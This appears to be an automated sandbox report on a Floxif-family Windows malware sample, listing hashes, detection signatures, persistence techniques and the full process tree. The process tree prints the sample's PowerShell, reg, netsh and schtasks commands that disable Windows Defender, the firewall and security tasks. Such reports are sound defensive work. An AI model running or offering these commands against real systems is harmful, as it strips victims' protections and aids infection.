Analysis
-
max time kernel
150s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
04-01-2025 19:33
Static task
static1
Behavioral task
behavioral1
Sample
09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe
Resource
win10v2004-20241007-en
General
-
Target
09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe
-
Size
313KB
-
MD5
3e23d56e5ced25d69b67735acb9ec044
-
SHA1
68b4163fade128741c2954579c5b2bc5ca17b6c2
-
SHA256
09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba
-
SHA512
4570b509f66b67c1b1b234d66415456435040c2b6992aa8c0359c47ac984f245be72007f5739f56c0c11beabe69f3a6091821869f4fbf7da372216653d77fb2b
-
SSDEEP
6144:UsLqdufVUNDaPxdk1cWQRNTBSNBV+UdvrEFp7hKjKp1:PFUNDaPQv0NT0NBjvrEH7+8
Malware Config
Signatures
-
Floxif family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Modifies visiblity of hidden/system files in Explorer 2 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" svchost.exe -
Detects Floxif payload 1 IoCs
resource yara_rule behavioral1/files/0x0007000000015d50-13.dat floxif -
Event Triggered Execution: AppInit DLLs 1 TTPs
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes.
-
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 2656 netsh.exe -
ACProtect 1.3x - 1.4x DLL software 1 IoCs
Detects file using ACProtect software.
resource yara_rule behavioral1/files/0x0007000000015d50-13.dat acprotect -
Executes dropped EXE 6 IoCs
pid Process 1328 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 2936 icsys.icn.exe 2916 explorer.exe 2748 spoolsv.exe 2520 svchost.exe 2504 spoolsv.exe -
Loads dropped DLL 15 IoCs
pid Process 2324 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 1328 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 2324 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 2936 icsys.icn.exe 2936 icsys.icn.exe 2916 explorer.exe 2916 explorer.exe 2748 spoolsv.exe 2748 spoolsv.exe 2520 svchost.exe 2520 svchost.exe 2504 spoolsv.exe 1804 schtasks.exe 3064 schtasks.exe 2100 schtasks.exe -
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\resources\\themes\\explorer.exe RO" svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\resources\\svchost.exe RO" svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\resources\\themes\\explorer.exe RO" explorer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\resources\\svchost.exe RO" explorer.exe -
pid Process 1596 powershell.exe 2840 powershell.exe 2392 powershell.exe 680 powershell.exe 604 powershell.exe 872 powershell.exe 1124 powershell.exe 2704 powershell.exe 2232 powershell.exe 1416 powershell.exe 2808 powershell.exe 1376 powershell.exe 2668 powershell.exe 1808 powershell.exe 3032 powershell.exe 684 powershell.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\e: 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe -
Modifies Security services 2 TTPs 4 IoCs
Modifies the startup behavior of a security service.
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdBoot\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdFilter\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisDrv\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisSvc\Start = "4" reg.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\explorer.exe explorer.exe File opened for modification C:\Windows\SysWOW64\explorer.exe svchost.exe -
resource yara_rule behavioral1/files/0x0007000000015d50-13.dat upx behavioral1/memory/1328-15-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral1/memory/2936-26-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral1/memory/2936-37-0x0000000002050000-0x000000000206F000-memory.dmp upx behavioral1/memory/2916-40-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral1/memory/2748-62-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral1/memory/2520-76-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral1/memory/2936-74-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral1/memory/2748-68-0x00000000004F0000-0x000000000050F000-memory.dmp upx behavioral1/memory/1328-67-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral1/memory/2916-86-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral1/memory/2504-87-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral1/memory/2504-90-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral1/memory/2748-94-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral1/memory/2936-97-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral1/memory/1804-100-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral1/memory/1804-102-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral1/memory/1328-186-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral1/memory/2520-188-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral1/memory/2916-189-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral1/memory/3064-202-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral1/memory/3064-203-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral1/memory/2100-221-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral1/memory/2100-222-0x0000000010000000-0x0000000010030000-memory.dmp upx -
Drops file in Program Files directory 1 IoCs
description ioc Process File created C:\Program Files\Common Files\System\symsrv.dll 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe -
Drops file in Windows directory 5 IoCs
description ioc Process File opened for modification \??\c:\windows\resources\spoolsv.exe explorer.exe File opened for modification \??\c:\windows\resources\svchost.exe spoolsv.exe File opened for modification C:\Windows\Resources\tjud.exe explorer.exe File opened for modification C:\Windows\Resources\Themes\icsys.icn.exe 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe File opened for modification \??\c:\windows\resources\themes\explorer.exe icsys.icn.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 10 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icsys.icn.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language spoolsv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language spoolsv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1804 schtasks.exe 3064 schtasks.exe 2100 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2324 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 2324 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 2324 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 2324 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 2324 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 2324 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 2324 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 2324 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 2324 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 2324 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 2324 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 2324 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 2324 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 2324 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 2324 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 2324 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 2936 icsys.icn.exe 2936 icsys.icn.exe 2936 icsys.icn.exe 2936 icsys.icn.exe 2936 icsys.icn.exe 2936 icsys.icn.exe 2936 icsys.icn.exe 2936 icsys.icn.exe 2936 icsys.icn.exe 2936 icsys.icn.exe 2936 icsys.icn.exe 2936 icsys.icn.exe 2936 icsys.icn.exe 2936 icsys.icn.exe 2936 icsys.icn.exe 2936 icsys.icn.exe 2936 icsys.icn.exe 2916 explorer.exe 2916 explorer.exe 2916 explorer.exe 2916 explorer.exe 2916 explorer.exe 2916 explorer.exe 2916 explorer.exe 2916 explorer.exe 2916 explorer.exe 2916 explorer.exe 2916 explorer.exe 2916 explorer.exe 2916 explorer.exe 2916 explorer.exe 2916 explorer.exe 2916 explorer.exe 2520 svchost.exe 2520 svchost.exe 2520 svchost.exe 2520 svchost.exe 2520 svchost.exe 2520 svchost.exe 2520 svchost.exe 2520 svchost.exe 2520 svchost.exe 2520 svchost.exe 2520 svchost.exe 2520 svchost.exe 2520 svchost.exe 2520 svchost.exe 2520 svchost.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 2916 explorer.exe 2520 svchost.exe -
Suspicious use of AdjustPrivilegeToken 25 IoCs
description pid Process Token: SeDebugPrivilege 1328 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe Token: SeDebugPrivilege 2936 icsys.icn.exe Token: SeDebugPrivilege 2916 explorer.exe Token: SeDebugPrivilege 2748 spoolsv.exe Token: SeDebugPrivilege 2520 svchost.exe Token: SeDebugPrivilege 2232 powershell.exe Token: SeDebugPrivilege 2504 spoolsv.exe Token: SeDebugPrivilege 1804 schtasks.exe Token: SeDebugPrivilege 1808 powershell.exe Token: SeDebugPrivilege 1416 powershell.exe Token: SeDebugPrivilege 2808 powershell.exe Token: SeDebugPrivilege 1124 powershell.exe Token: SeDebugPrivilege 680 powershell.exe Token: SeDebugPrivilege 604 powershell.exe Token: SeDebugPrivilege 1376 powershell.exe Token: SeDebugPrivilege 872 powershell.exe Token: SeDebugPrivilege 3032 powershell.exe Token: SeDebugPrivilege 684 powershell.exe Token: SeDebugPrivilege 1596 powershell.exe Token: SeDebugPrivilege 2840 powershell.exe Token: SeDebugPrivilege 2392 powershell.exe Token: SeDebugPrivilege 2704 powershell.exe Token: SeDebugPrivilege 2668 powershell.exe Token: SeDebugPrivilege 3064 schtasks.exe Token: SeDebugPrivilege 2100 schtasks.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 2324 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 2324 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 2936 icsys.icn.exe 2936 icsys.icn.exe 2916 explorer.exe 2916 explorer.exe 2748 spoolsv.exe 2748 spoolsv.exe 2520 svchost.exe 2520 svchost.exe 2504 spoolsv.exe 2504 spoolsv.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2324 wrote to memory of 1328 2324 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 28 PID 2324 wrote to memory of 1328 2324 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 28 PID 2324 wrote to memory of 1328 2324 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 28 PID 2324 wrote to memory of 1328 2324 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 28 PID 2324 wrote to memory of 2936 2324 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 29 PID 2324 wrote to memory of 2936 2324 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 29 PID 2324 wrote to memory of 2936 2324 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 29 PID 2324 wrote to memory of 2936 2324 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 29 PID 1328 wrote to memory of 2824 1328 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 30 PID 1328 wrote to memory of 2824 1328 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 30 PID 1328 wrote to memory of 2824 1328 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 30 PID 1328 wrote to memory of 2824 1328 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 30 PID 2936 wrote to memory of 2916 2936 icsys.icn.exe 32 PID 2936 wrote to memory of 2916 2936 icsys.icn.exe 32 PID 2936 wrote to memory of 2916 2936 icsys.icn.exe 32 PID 2936 wrote to memory of 2916 2936 icsys.icn.exe 32 PID 2824 wrote to memory of 2232 2824 cmd.exe 33 PID 2824 wrote to memory of 2232 2824 cmd.exe 33 PID 2824 wrote to memory of 2232 2824 cmd.exe 33 PID 2916 wrote to memory of 2748 2916 explorer.exe 34 PID 2916 wrote to memory of 2748 2916 explorer.exe 34 PID 2916 wrote to memory of 2748 2916 explorer.exe 34 PID 2916 wrote to memory of 2748 2916 explorer.exe 34 PID 2748 wrote to memory of 2520 2748 spoolsv.exe 35 PID 2748 wrote to memory of 2520 2748 spoolsv.exe 35 PID 2748 wrote to memory of 2520 2748 spoolsv.exe 35 PID 2748 wrote to memory of 2520 2748 spoolsv.exe 35 PID 2520 wrote to memory of 2504 2520 svchost.exe 36 PID 2520 wrote to memory of 2504 2520 svchost.exe 36 PID 2520 wrote to memory of 2504 2520 svchost.exe 36 PID 2520 wrote to memory of 2504 2520 svchost.exe 36 PID 2916 wrote to memory of 2264 2916 explorer.exe 37 PID 2916 wrote to memory of 2264 2916 explorer.exe 37 PID 2916 wrote to memory of 2264 2916 explorer.exe 37 PID 2916 wrote to memory of 2264 2916 explorer.exe 37 PID 2520 wrote to memory of 1804 2520 svchost.exe 38 PID 2520 wrote to memory of 1804 2520 svchost.exe 38 PID 2520 wrote to memory of 1804 2520 svchost.exe 38 PID 2520 wrote to memory of 1804 2520 svchost.exe 38 PID 2824 wrote to memory of 1808 2824 cmd.exe 41 PID 2824 wrote to memory of 1808 2824 cmd.exe 41 PID 2824 wrote to memory of 1808 2824 cmd.exe 41 PID 2824 wrote to memory of 1416 2824 cmd.exe 42 PID 2824 wrote to memory of 1416 2824 cmd.exe 42 PID 2824 wrote to memory of 1416 2824 cmd.exe 42 PID 2824 wrote to memory of 2808 2824 cmd.exe 43 PID 2824 wrote to memory of 2808 2824 cmd.exe 43 PID 2824 wrote to memory of 2808 2824 cmd.exe 43 PID 2824 wrote to memory of 1124 2824 cmd.exe 44 PID 2824 wrote to memory of 1124 2824 cmd.exe 44 PID 2824 wrote to memory of 1124 2824 cmd.exe 44 PID 2824 wrote to memory of 680 2824 cmd.exe 45 PID 2824 wrote to memory of 680 2824 cmd.exe 45 PID 2824 wrote to memory of 680 2824 cmd.exe 45 PID 2824 wrote to memory of 604 2824 cmd.exe 46 PID 2824 wrote to memory of 604 2824 cmd.exe 46 PID 2824 wrote to memory of 604 2824 cmd.exe 46 PID 2824 wrote to memory of 1376 2824 cmd.exe 47 PID 2824 wrote to memory of 1376 2824 cmd.exe 47 PID 2824 wrote to memory of 1376 2824 cmd.exe 47 PID 2824 wrote to memory of 872 2824 cmd.exe 48 PID 2824 wrote to memory of 872 2824 cmd.exe 48 PID 2824 wrote to memory of 872 2824 cmd.exe 48 PID 2824 wrote to memory of 3032 2824 cmd.exe 49 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe"C:\Users\Admin\AppData\Local\Temp\09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe"1⤵
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2324 -
\??\c:\users\admin\appdata\local\temp\09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exec:\users\admin\appdata\local\temp\09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1328 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\898A.tmp\898B.tmp\898C.bat c:\users\admin\appdata\local\temp\09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe "3⤵
- Suspicious use of WriteProcessMemory
PID:2824 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2232
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1808
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableBlockAtFirstSeen $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1416
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableIOAVProtection $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2808
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisablePrivacyMode $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1124
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:680
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:604
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1376
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableScriptScanning $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:872
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3032
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -MAPSReporting 0"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:684
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1596
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2840
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2392
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2704
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "netsh advfirewall set allprofiles state off"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2668 -
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2656
-
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f4⤵PID:2912
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f4⤵PID:2504
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f4⤵PID:2512
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f4⤵PID:2536
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:2768
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:2760
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:2752
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:2096
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:2128
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f4⤵PID:2080
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f4⤵PID:2252
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f4⤵PID:2308
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f4⤵PID:856
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f4⤵PID:1148
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f4⤵PID:980
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable4⤵PID:2264
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable4⤵PID:2980
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable4⤵PID:1872
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable4⤵PID:2288
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable4⤵PID:1284
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f4⤵PID:2644
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f4⤵PID:2836
-
-
C:\Windows\system32\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f4⤵PID:2272
-
-
